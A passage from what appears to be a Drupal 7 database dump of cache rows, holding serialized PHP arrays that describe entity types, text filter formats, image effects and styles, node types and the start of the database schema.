types\";}}s:11:\"rdf_mapping\";a:8:{s:7:\"rdftype\";a:2:{i:0;s:9:\"sioc:Post\";i:1;s:13:\"sioct:Comment\";}s:5:\"title\";a:1:{s:10:\"predicates\";a:1:{i:0;s:8:\"dc:title\";}}s:7:\"created\";a:3:{s:10:\"predicates\";a:2:{i:0;s:7:\"dc:date\";i:1;s:10:\"dc:created\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:7:\"changed\";a:3:{s:10:\"predicates\";a:1:{i:0;s:11:\"dc:modified\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:12:\"comment_body\";a:1:{s:10:\"predicates\";a:1:{i:0;s:15:\"content:encoded\";}}s:3:\"pid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:13:\"sioc:reply_of\";}s:4:\"type\";s:3:\"rel\";}s:3:\"uid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:has_creator\";}s:4:\"type\";s:3:\"rel\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:1:{i:0;s:9:\"foaf:name\";}}}}s:17:\"comment_node_page\";a:4:{s:5:\"label\";s:18:\"Basic page comment\";s:11:\"node bundle\";s:4:\"page\";s:5:\"admin\";a:4:{s:4:\"path\";s:55:\"admin/structure/types/manage/%comment_node_type/comment\";s:15:\"bundle argument\";i:4;s:9:\"real path\";s:41:\"admin/structure/types/manage/page/comment\";s:16:\"access arguments\";a:1:{i:0;s:24:\"administer content types\";}}s:11:\"rdf_mapping\";a:8:{s:7:\"rdftype\";a:2:{i:0;s:9:\"sioc:Post\";i:1;s:13:\"sioct:Comment\";}s:5:\"title\";a:1:{s:10:\"predicates\";a:1:{i:0;s:8:\"dc:title\";}}s:7:\"created\";a:3:{s:10:\"predicates\";a:2:{i:0;s:7:\"dc:date\";i:1;s:10:\"dc:created\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:7:\"changed\";a:3:{s:10:\"predicates\";a:1:{i:0;s:11:\"dc:modified\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:12:\"comment_body\";a:1:{s:10:\"predicates\";a:1:{i:0;s:15:\"content:encoded\";}}s:3:\"pid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:13:\"sioc:reply_of\";}s:4:\"type\";s:3:\"rel\";}s:3:\"uid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:has_creator\";}s:4:\"type\";s:3:\"rel\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:1:{i:0;s:9:\"foaf:name\";}}}}}s:10:\"view modes\";a:1:{s:4:\"full\";a:2:{s:5:\"label\";s:12:\"Full comment\";s:15:\"custom settings\";b:0;}}s:12:\"static cache\";b:0;s:11:\"field cache\";b:1;s:9:\"load hook\";s:12:\"comment_load\";s:11:\"translation\";a:0:{}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:14:{i:0;s:3:\"cid\";i:1;s:3:\"pid\";i:2;s:3:\"nid\";i:3;s:3:\"uid\";i:4;s:7:\"subject\";i:5;s:8:\"hostname\";i:6;s:7:\"created\";i:7;s:7:\"changed\";i:8;s:6:\"status\";i:9;s:6:\"thread\";i:10;s:4:\"name\";i:11;s:4:\"mail\";i:12;s:8:\"homepage\";i:13;s:8:\"language\";}}}s:4:\"node\";a:15:{s:5:\"label\";s:4:\"Node\";s:16:\"controller class\";s:14:\"NodeController\";s:10:\"base table\";s:4:\"node\";s:14:\"revision table\";s:13:\"node_revision\";s:12:\"uri callback\";s:8:\"node_uri\";s:9:\"fieldable\";b:1;s:11:\"entity keys\";a:5:{s:2:\"id\";s:3:\"nid\";s:8:\"revision\";s:3:\"vid\";s:6:\"bundle\";s:4:\"type\";s:5:\"label\";s:5:\"title\";s:8:\"language\";s:8:\"language\";}s:11:\"bundle keys\";a:1:{s:6:\"bundle\";s:4:\"type\";}s:7:\"bundles\";a:2:{s:7:\"article\";a:3:{s:5:\"label\";s:7:\"Article\";s:5:\"admin\";a:4:{s:4:\"path\";s:39:\"admin/structure/types/manage/%node_type\";s:9:\"real path\";s:36:\"admin/structure/types/manage/article\";s:15:\"bundle argument\";i:4;s:16:\"access arguments\";a:1:{i:0;s:24:\"administer content types\";}}s:11:\"rdf_mapping\";a:11:{s:11:\"field_image\";a:2:{s:10:\"predicates\";a:2:{i:0;s:8:\"og:image\";i:1;s:12:\"rdfs:seeAlso\";}s:4:\"type\";s:3:\"rel\";}s:10:\"field_tags\";a:2:{s:10:\"predicates\";a:1:{i:0;s:10:\"dc:subject\";}s:4:\"type\";s:3:\"rel\";}s:7:\"rdftype\";a:2:{i:0;s:9:\"sioc:Item\";i:1;s:13:\"foaf:Document\";}s:5:\"title\";a:1:{s:10:\"predicates\";a:1:{i:0;s:8:\"dc:title\";}}s:7:\"created\";a:3:{s:10:\"predicates\";a:2:{i:0;s:7:\"dc:date\";i:1;s:10:\"dc:created\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:7:\"changed\";a:3:{s:10:\"predicates\";a:1:{i:0;s:11:\"dc:modified\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:4:\"body\";a:1:{s:10:\"predicates\";a:1:{i:0;s:15:\"content:encoded\";}}s:3:\"uid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:has_creator\";}s:4:\"type\";s:3:\"rel\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:1:{i:0;s:9:\"foaf:name\";}}s:13:\"comment_count\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:num_replies\";}s:8:\"datatype\";s:11:\"xsd:integer\";}s:13:\"last_activity\";a:3:{s:10:\"predicates\";a:1:{i:0;s:23:\"sioc:last_activity_date\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}}}s:4:\"page\";a:3:{s:5:\"label\";s:10:\"Basic page\";s:5:\"admin\";a:4:{s:4:\"path\";s:39:\"admin/structure/types/manage/%node_type\";s:9:\"real path\";s:33:\"admin/structure/types/manage/page\";s:15:\"bundle argument\";i:4;s:16:\"access arguments\";a:1:{i:0;s:24:\"administer content types\";}}s:11:\"rdf_mapping\";a:9:{s:7:\"rdftype\";a:1:{i:0;s:13:\"foaf:Document\";}s:5:\"title\";a:1:{s:10:\"predicates\";a:1:{i:0;s:8:\"dc:title\";}}s:7:\"created\";a:3:{s:10:\"predicates\";a:2:{i:0;s:7:\"dc:date\";i:1;s:10:\"dc:created\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:7:\"changed\";a:3:{s:10:\"predicates\";a:1:{i:0;s:11:\"dc:modified\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}s:4:\"body\";a:1:{s:10:\"predicates\";a:1:{i:0;s:15:\"content:encoded\";}}s:3:\"uid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:has_creator\";}s:4:\"type\";s:3:\"rel\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:1:{i:0;s:9:\"foaf:name\";}}s:13:\"comment_count\";a:2:{s:10:\"predicates\";a:1:{i:0;s:16:\"sioc:num_replies\";}s:8:\"datatype\";s:11:\"xsd:integer\";}s:13:\"last_activity\";a:3:{s:10:\"predicates\";a:1:{i:0;s:23:\"sioc:last_activity_date\";}s:8:\"datatype\";s:12:\"xsd:dateTime\";s:8:\"callback\";s:12:\"date_iso8601\";}}}}s:10:\"view modes\";a:5:{s:4:\"full\";a:2:{s:5:\"label\";s:12:\"Full content\";s:15:\"custom settings\";b:0;}s:6:\"teaser\";a:2:{s:5:\"label\";s:6:\"Teaser\";s:15:\"custom settings\";b:1;}s:3:\"rss\";a:2:{s:5:\"label\";s:3:\"RSS\";s:15:\"custom settings\";b:0;}s:12:\"search_index\";a:2:{s:5:\"label\";s:12:\"Search index\";s:15:\"custom settings\";b:0;}s:13:\"search_result\";a:2:{s:5:\"label\";s:32:\"Search result highlighting input\";s:15:\"custom settings\";b:0;}}s:12:\"static cache\";b:1;s:11:\"field cache\";b:1;s:9:\"load hook\";s:9:\"node_load\";s:11:\"translation\";a:0:{}s:17:\"schema_fields_sql\";a:2:{s:10:\"base table\";a:14:{i:0;s:3:\"nid\";i:1;s:3:\"vid\";i:2;s:4:\"type\";i:3;s:8:\"language\";i:4;s:5:\"title\";i:5;s:3:\"uid\";i:6;s:6:\"status\";i:7;s:7:\"created\";i:8;s:7:\"changed\";i:9;s:7:\"comment\";i:10;s:7:\"promote\";i:11;s:6:\"sticky\";i:12;s:4:\"tnid\";i:13;s:9:\"translate\";}s:14:\"revision table\";a:10:{i:0;s:3:\"nid\";i:1;s:3:\"vid\";i:2;s:3:\"uid\";i:3;s:5:\"title\";i:4;s:3:\"log\";i:5;s:9:\"timestamp\";i:6;s:6:\"status\";i:7;s:7:\"comment\";i:8;s:7:\"promote\";i:9;s:6:\"sticky\";}}}s:4:\"file\";a:12:{s:5:\"label\";s:4:\"File\";s:10:\"base table\";s:12:\"file_managed\";s:11:\"entity keys\";a:4:{s:2:\"id\";s:3:\"fid\";s:5:\"label\";s:8:\"filename\";s:8:\"revision\";s:0:\"\";s:6:\"bundle\";s:0:\"\";}s:12:\"static cache\";b:0;s:9:\"fieldable\";b:0;s:16:\"controller class\";s:29:\"DrupalDefaultEntityController\";s:11:\"field cache\";b:1;s:9:\"load hook\";s:9:\"file_load\";s:7:\"bundles\";a:1:{s:4:\"file\";a:2:{s:5:\"label\";s:4:\"File\";s:11:\"rdf_mapping\";a:0:{}}}s:10:\"view modes\";a:0:{}s:11:\"translation\";a:0:{}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:8:{i:0;s:3:\"fid\";i:1;s:3:\"uid\";i:2;s:8:\"filename\";i:3;s:3:\"uri\";i:4;s:8:\"filemime\";i:5;s:8:\"filesize\";i:6;s:6:\"status\";i:7;s:9:\"timestamp\";}}}s:13:\"taxonomy_term\";a:14:{s:5:\"label\";s:13:\"Taxonomy term\";s:16:\"controller class\";s:22:\"TaxonomyTermController\";s:10:\"base table\";s:18:\"taxonomy_term_data\";s:12:\"uri callback\";s:17:\"taxonomy_term_uri\";s:9:\"fieldable\";b:1;s:11:\"entity keys\";a:4:{s:2:\"id\";s:3:\"tid\";s:6:\"bundle\";s:23:\"vocabulary_machine_name\";s:5:\"label\";s:4:\"name\";s:8:\"revision\";s:0:\"\";}s:11:\"bundle keys\";a:1:{s:6:\"bundle\";s:12:\"machine_name\";}s:7:\"bundles\";a:1:{s:4:\"tags\";a:3:{s:5:\"label\";s:4:\"Tags\";s:5:\"admin\";a:4:{s:4:\"path\";s:58:\"admin/structure/taxonomy/%taxonomy_vocabulary_machine_name\";s:9:\"real path\";s:29:\"admin/structure/taxonomy/tags\";s:15:\"bundle argument\";i:3;s:16:\"access arguments\";a:1:{i:0;s:19:\"administer taxonomy\";}}s:11:\"rdf_mapping\";a:5:{s:7:\"rdftype\";a:1:{i:0;s:12:\"skos:Concept\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:2:{i:0;s:10:\"rdfs:label\";i:1;s:14:\"skos:prefLabel\";}}s:11:\"description\";a:1:{s:10:\"predicates\";a:1:{i:0;s:15:\"skos:definition\";}}s:3:\"vid\";a:2:{s:10:\"predicates\";a:1:{i:0;s:13:\"skos:inScheme\";}s:4:\"type\";s:3:\"rel\";}s:6:\"parent\";a:2:{s:10:\"predicates\";a:1:{i:0;s:12:\"skos:broader\";}s:4:\"type\";s:3:\"rel\";}}}}s:10:\"view modes\";a:1:{s:4:\"full\";a:2:{s:5:\"label\";s:18:\"Taxonomy term page\";s:15:\"custom settings\";b:0;}}s:12:\"static cache\";b:1;s:11:\"field cache\";b:1;s:9:\"load hook\";s:18:\"taxonomy_term_load\";s:11:\"translation\";a:0:{}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:6:{i:0;s:3:\"tid\";i:1;s:3:\"vid\";i:2;s:4:\"name\";i:3;s:11:\"description\";i:4;s:6:\"format\";i:5;s:6:\"weight\";}}}s:19:\"taxonomy_vocabulary\";a:12:{s:5:\"label\";s:19:\"Taxonomy vocabulary\";s:16:\"controller class\";s:28:\"TaxonomyVocabularyController\";s:10:\"base table\";s:19:\"taxonomy_vocabulary\";s:11:\"entity keys\";a:4:{s:2:\"id\";s:3:\"vid\";s:5:\"label\";s:4:\"name\";s:8:\"revision\";s:0:\"\";s:6:\"bundle\";s:0:\"\";}s:9:\"fieldable\";b:0;s:12:\"static cache\";b:1;s:11:\"field cache\";b:1;s:9:\"load hook\";s:24:\"taxonomy_vocabulary_load\";s:7:\"bundles\";a:1:{s:19:\"taxonomy_vocabulary\";a:2:{s:5:\"label\";s:19:\"Taxonomy vocabulary\";s:11:\"rdf_mapping\";a:3:{s:7:\"rdftype\";a:1:{i:0;s:18:\"skos:ConceptScheme\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:1:{i:0;s:8:\"dc:title\";}}s:11:\"description\";a:1:{s:10:\"predicates\";a:1:{i:0;s:12:\"rdfs:comment\";}}}}}s:10:\"view modes\";a:0:{}s:11:\"translation\";a:0:{}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:7:{i:0;s:3:\"vid\";i:1;s:4:\"name\";i:2;s:12:\"machine_name\";i:3;s:11:\"description\";i:4;s:9:\"hierarchy\";i:5;s:6:\"module\";i:6;s:6:\"weight\";}}}s:4:\"user\";a:14:{s:5:\"label\";s:4:\"User\";s:16:\"controller class\";s:14:\"UserController\";s:10:\"base table\";s:5:\"users\";s:12:\"uri callback\";s:8:\"user_uri\";s:14:\"label callback\";s:15:\"format_username\";s:9:\"fieldable\";b:1;s:11:\"entity keys\";a:3:{s:2:\"id\";s:3:\"uid\";s:8:\"revision\";s:0:\"\";s:6:\"bundle\";s:0:\"\";}s:7:\"bundles\";a:1:{s:4:\"user\";a:3:{s:5:\"label\";s:4:\"User\";s:5:\"admin\";a:2:{s:4:\"path\";s:28:\"admin/config/people/accounts\";s:16:\"access arguments\";a:1:{i:0;s:16:\"administer users\";}}s:11:\"rdf_mapping\";a:3:{s:7:\"rdftype\";a:1:{i:0;s:16:\"sioc:UserAccount\";}s:4:\"name\";a:1:{s:10:\"predicates\";a:1:{i:0;s:9:\"foaf:name\";}}s:8:\"homepage\";a:2:{s:10:\"predicates\";a:1:{i:0;s:9:\"foaf:page\";}s:4:\"type\";s:3:\"rel\";}}}}s:10:\"view modes\";a:1:{s:4:\"full\";a:2:{s:5:\"label\";s:12:\"User account\";s:15:\"custom settings\";b:0;}}s:12:\"static cache\";b:1;s:11:\"field cache\";b:1;s:9:\"load hook\";s:9:\"user_load\";s:11:\"translation\";a:0:{}s:17:\"schema_fields_sql\";a:1:{s:10:\"base table\";a:16:{i:0;s:3:\"uid\";i:1;s:4:\"name\";i:2;s:4:\"pass\";i:3;s:4:\"mail\";i:4;s:5:\"theme\";i:5;s:9:\"signature\";i:6;s:16:\"signature_format\";i:7;s:7:\"created\";i:8;s:6:\"access\";i:9;s:5:\"login\";i:10;s:6:\"status\";i:11;s:8:\"timezone\";i:12;s:8:\"language\";i:13;s:7:\"picture\";i:14;s:4:\"init\";i:15;s:4:\"data\";}}}}',0,1423658773,1),('filter_formats:en','a:3:{s:13:\"filtered_html\";O:8:\"stdClass\":5:{s:6:\"format\";s:13:\"filtered_html\";s:4:\"name\";s:13:\"Filtered HTML\";s:5:\"cache\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:6:\"weight\";s:1:\"0\";}s:9:\"full_html\";O:8:\"stdClass\":5:{s:6:\"format\";s:9:\"full_html\";s:4:\"name\";s:9:\"Full HTML\";s:5:\"cache\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:6:\"weight\";s:1:\"1\";}s:10:\"plain_text\";O:8:\"stdClass\":5:{s:6:\"format\";s:10:\"plain_text\";s:4:\"name\";s:10:\"Plain text\";s:5:\"cache\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:6:\"weight\";s:2:\"10\";}}',0,1423658773,1),('filter_list_format','a:3:{s:9:\"full_html\";a:5:{s:11:\"filter_html\";O:8:\"stdClass\":6:{s:6:\"format\";s:9:\"full_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:11:\"filter_html\";s:6:\"weight\";s:3:\"-10\";s:6:\"status\";s:1:\"0\";s:8:\"settings\";s:168:\"a:3:{s:12:\"allowed_html\";s:74:\"
                      1. \";s:16:\"filter_html_help\";i:1;s:20:\"filter_html_nofollow\";i:0;}\";}s:18:\"filter_html_escape\";O:8:\"stdClass\":6:{s:6:\"format\";s:9:\"full_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:18:\"filter_html_escape\";s:6:\"weight\";s:3:\"-10\";s:6:\"status\";s:1:\"0\";s:8:\"settings\";s:6:\"a:0:{}\";}s:10:\"filter_url\";O:8:\"stdClass\":6:{s:6:\"format\";s:9:\"full_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:10:\"filter_url\";s:6:\"weight\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:36:\"a:1:{s:17:\"filter_url_length\";i:72;}\";}s:12:\"filter_autop\";O:8:\"stdClass\":6:{s:6:\"format\";s:9:\"full_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:12:\"filter_autop\";s:6:\"weight\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:6:\"a:0:{}\";}s:20:\"filter_htmlcorrector\";O:8:\"stdClass\":6:{s:6:\"format\";s:9:\"full_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:20:\"filter_htmlcorrector\";s:6:\"weight\";s:2:\"10\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:6:\"a:0:{}\";}}s:10:\"plain_text\";a:5:{s:11:\"filter_html\";O:8:\"stdClass\":6:{s:6:\"format\";s:10:\"plain_text\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:11:\"filter_html\";s:6:\"weight\";s:3:\"-10\";s:6:\"status\";s:1:\"0\";s:8:\"settings\";s:168:\"a:3:{s:12:\"allowed_html\";s:74:\"
                          1. \";s:16:\"filter_html_help\";i:1;s:20:\"filter_html_nofollow\";i:0;}\";}s:18:\"filter_html_escape\";O:8:\"stdClass\":6:{s:6:\"format\";s:10:\"plain_text\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:18:\"filter_html_escape\";s:6:\"weight\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:6:\"a:0:{}\";}s:10:\"filter_url\";O:8:\"stdClass\":6:{s:6:\"format\";s:10:\"plain_text\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:10:\"filter_url\";s:6:\"weight\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:36:\"a:1:{s:17:\"filter_url_length\";i:72;}\";}s:12:\"filter_autop\";O:8:\"stdClass\":6:{s:6:\"format\";s:10:\"plain_text\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:12:\"filter_autop\";s:6:\"weight\";s:1:\"2\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:6:\"a:0:{}\";}s:20:\"filter_htmlcorrector\";O:8:\"stdClass\":6:{s:6:\"format\";s:10:\"plain_text\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:20:\"filter_htmlcorrector\";s:6:\"weight\";s:2:\"10\";s:6:\"status\";s:1:\"0\";s:8:\"settings\";s:6:\"a:0:{}\";}}s:13:\"filtered_html\";a:5:{s:18:\"filter_html_escape\";O:8:\"stdClass\":6:{s:6:\"format\";s:13:\"filtered_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:18:\"filter_html_escape\";s:6:\"weight\";s:3:\"-10\";s:6:\"status\";s:1:\"0\";s:8:\"settings\";s:6:\"a:0:{}\";}s:10:\"filter_url\";O:8:\"stdClass\":6:{s:6:\"format\";s:13:\"filtered_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:10:\"filter_url\";s:6:\"weight\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:36:\"a:1:{s:17:\"filter_url_length\";i:72;}\";}s:11:\"filter_html\";O:8:\"stdClass\":6:{s:6:\"format\";s:13:\"filtered_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:11:\"filter_html\";s:6:\"weight\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:168:\"a:3:{s:12:\"allowed_html\";s:74:\"
                              1. \";s:16:\"filter_html_help\";i:1;s:20:\"filter_html_nofollow\";i:0;}\";}s:12:\"filter_autop\";O:8:\"stdClass\":6:{s:6:\"format\";s:13:\"filtered_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:12:\"filter_autop\";s:6:\"weight\";s:1:\"2\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:6:\"a:0:{}\";}s:20:\"filter_htmlcorrector\";O:8:\"stdClass\":6:{s:6:\"format\";s:13:\"filtered_html\";s:6:\"module\";s:6:\"filter\";s:4:\"name\";s:20:\"filter_htmlcorrector\";s:6:\"weight\";s:2:\"10\";s:6:\"status\";s:1:\"1\";s:8:\"settings\";s:6:\"a:0:{}\";}}}',0,1423658787,1),('image_effects:en','a:6:{s:10:\"image_crop\";a:9:{s:5:\"label\";s:4:\"Crop\";s:4:\"help\";s:78:\"Cropping will remove portions of an image to make it the specified dimensions.\";s:15:\"effect callback\";s:17:\"image_crop_effect\";s:19:\"dimensions callback\";s:23:\"image_resize_dimensions\";s:13:\"form callback\";s:15:\"image_crop_form\";s:13:\"summary theme\";s:18:\"image_crop_summary\";s:6:\"module\";s:5:\"image\";s:4:\"name\";s:10:\"image_crop\";s:4:\"data\";a:0:{}}s:16:\"image_desaturate\";a:7:{s:5:\"label\";s:10:\"Desaturate\";s:4:\"help\";s:42:\"Desaturate converts an image to grayscale.\";s:15:\"effect callback\";s:23:\"image_desaturate_effect\";s:22:\"dimensions passthrough\";b:1;s:6:\"module\";s:5:\"image\";s:4:\"name\";s:16:\"image_desaturate\";s:4:\"data\";a:0:{}}s:12:\"image_resize\";a:9:{s:5:\"label\";s:6:\"Resize\";s:4:\"help\";s:121:\"Resizing will make images an exact set of dimensions. This may cause images to be stretched or shrunk disproportionately.\";s:15:\"effect callback\";s:19:\"image_resize_effect\";s:19:\"dimensions callback\";s:23:\"image_resize_dimensions\";s:13:\"form callback\";s:17:\"image_resize_form\";s:13:\"summary theme\";s:20:\"image_resize_summary\";s:6:\"module\";s:5:\"image\";s:4:\"name\";s:12:\"image_resize\";s:4:\"data\";a:0:{}}s:12:\"image_rotate\";a:9:{s:5:\"label\";s:6:\"Rotate\";s:4:\"help\";s:87:\"Rotating an image may cause the dimensions of an image to increase to fit the diagonal.\";s:15:\"effect callback\";s:19:\"image_rotate_effect\";s:19:\"dimensions callback\";s:23:\"image_rotate_dimensions\";s:13:\"form callback\";s:17:\"image_rotate_form\";s:13:\"summary theme\";s:20:\"image_rotate_summary\";s:6:\"module\";s:5:\"image\";s:4:\"name\";s:12:\"image_rotate\";s:4:\"data\";a:0:{}}s:11:\"image_scale\";a:9:{s:5:\"label\";s:5:\"Scale\";s:4:\"help\";s:142:\"Scaling will maintain the aspect-ratio of the original image. If only a single dimension is specified, the other dimension will be calculated.\";s:15:\"effect callback\";s:18:\"image_scale_effect\";s:19:\"dimensions callback\";s:22:\"image_scale_dimensions\";s:13:\"form callback\";s:16:\"image_scale_form\";s:13:\"summary theme\";s:19:\"image_scale_summary\";s:6:\"module\";s:5:\"image\";s:4:\"name\";s:11:\"image_scale\";s:4:\"data\";a:0:{}}s:20:\"image_scale_and_crop\";a:9:{s:5:\"label\";s:14:\"Scale and crop\";s:4:\"help\";s:191:\"Scale and crop will maintain the aspect-ratio of the original image, then crop the larger dimension. This is most useful for creating perfectly square thumbnails without stretching the image.\";s:15:\"effect callback\";s:27:\"image_scale_and_crop_effect\";s:19:\"dimensions callback\";s:23:\"image_resize_dimensions\";s:13:\"form callback\";s:17:\"image_resize_form\";s:13:\"summary theme\";s:20:\"image_resize_summary\";s:6:\"module\";s:5:\"image\";s:4:\"name\";s:20:\"image_scale_and_crop\";s:4:\"data\";a:0:{}}}',0,1423658967,1),('image_styles','a:3:{s:9:\"thumbnail\";a:5:{s:5:\"label\";s:19:\"Thumbnail (100x100)\";s:7:\"effects\";a:1:{i:0;a:10:{s:5:\"label\";s:5:\"Scale\";s:4:\"help\";s:142:\"Scaling will maintain the aspect-ratio of the original image. If only a single dimension is specified, the other dimension will be calculated.\";s:15:\"effect callback\";s:18:\"image_scale_effect\";s:19:\"dimensions callback\";s:22:\"image_scale_dimensions\";s:13:\"form callback\";s:16:\"image_scale_form\";s:13:\"summary theme\";s:19:\"image_scale_summary\";s:6:\"module\";s:5:\"image\";s:4:\"name\";s:11:\"image_scale\";s:4:\"data\";a:3:{s:5:\"width\";i:100;s:6:\"height\";i:100;s:7:\"upscale\";i:1;}s:6:\"weight\";i:0;}}s:4:\"name\";s:9:\"thumbnail\";s:6:\"module\";s:5:\"image\";s:7:\"storage\";i:4;}s:6:\"medium\";a:5:{s:5:\"label\";s:16:\"Medium (220x220)\";s:7:\"effects\";a:1:{i:0;a:10:{s:5:\"label\";s:5:\"Scale\";s:4:\"help\";s:142:\"Scaling will maintain the aspect-ratio of the original image. If only a single dimension is specified, the other dimension will be calculated.\";s:15:\"effect callback\";s:18:\"image_scale_effect\";s:19:\"dimensions callback\";s:22:\"image_scale_dimensions\";s:13:\"form callback\";s:16:\"image_scale_form\";s:13:\"summary theme\";s:19:\"image_scale_summary\";s:6:\"module\";s:5:\"image\";s:4:\"name\";s:11:\"image_scale\";s:4:\"data\";a:3:{s:5:\"width\";i:220;s:6:\"height\";i:220;s:7:\"upscale\";i:1;}s:6:\"weight\";i:0;}}s:4:\"name\";s:6:\"medium\";s:6:\"module\";s:5:\"image\";s:7:\"storage\";i:4;}s:5:\"large\";a:5:{s:5:\"label\";s:15:\"Large (480x480)\";s:7:\"effects\";a:1:{i:0;a:10:{s:5:\"label\";s:5:\"Scale\";s:4:\"help\";s:142:\"Scaling will maintain the aspect-ratio of the original image. If only a single dimension is specified, the other dimension will be calculated.\";s:15:\"effect callback\";s:18:\"image_scale_effect\";s:19:\"dimensions callback\";s:22:\"image_scale_dimensions\";s:13:\"form callback\";s:16:\"image_scale_form\";s:13:\"summary theme\";s:19:\"image_scale_summary\";s:6:\"module\";s:5:\"image\";s:4:\"name\";s:11:\"image_scale\";s:4:\"data\";a:3:{s:5:\"width\";i:480;s:6:\"height\";i:480;s:7:\"upscale\";i:0;}s:6:\"weight\";i:0;}}s:4:\"name\";s:5:\"large\";s:6:\"module\";s:5:\"image\";s:7:\"storage\";i:4;}}',0,1423658967,1),('node_types:en','O:8:\"stdClass\":2:{s:5:\"types\";a:2:{s:7:\"article\";O:8:\"stdClass\":14:{s:4:\"type\";s:7:\"article\";s:4:\"name\";s:7:\"Article\";s:4:\"base\";s:12:\"node_content\";s:6:\"module\";s:4:\"node\";s:11:\"description\";s:89:\"Use articles for time-sensitive content like news, press releases or blog posts.\";s:4:\"help\";s:0:\"\";s:9:\"has_title\";s:1:\"1\";s:11:\"title_label\";s:5:\"Title\";s:6:\"custom\";s:1:\"1\";s:8:\"modified\";s:1:\"1\";s:6:\"locked\";s:1:\"0\";s:8:\"disabled\";s:1:\"0\";s:9:\"orig_type\";s:7:\"article\";s:16:\"disabled_changed\";b:0;}s:4:\"page\";O:8:\"stdClass\":14:{s:4:\"type\";s:4:\"page\";s:4:\"name\";s:10:\"Basic page\";s:4:\"base\";s:12:\"node_content\";s:6:\"module\";s:4:\"node\";s:11:\"description\";s:77:\"Use basic pages for your static content, such as an \'About us\' page.\";s:4:\"help\";s:0:\"\";s:9:\"has_title\";s:1:\"1\";s:11:\"title_label\";s:5:\"Title\";s:6:\"custom\";s:1:\"1\";s:8:\"modified\";s:1:\"1\";s:6:\"locked\";s:1:\"0\";s:8:\"disabled\";s:1:\"0\";s:9:\"orig_type\";s:4:\"page\";s:16:\"disabled_changed\";b:0;}}s:5:\"names\";a:2:{s:7:\"article\";s:7:\"Article\";s:4:\"page\";s:10:\"Basic page\";}}',0,1423658761,1),('schema','a:77:{s:5:\"block\";a:6:{s:6:\"fields\";a:12:{s:3:\"bid\";a:2:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"delta\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:1:\"0\";}s:5:\"theme\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"status\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"region\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not 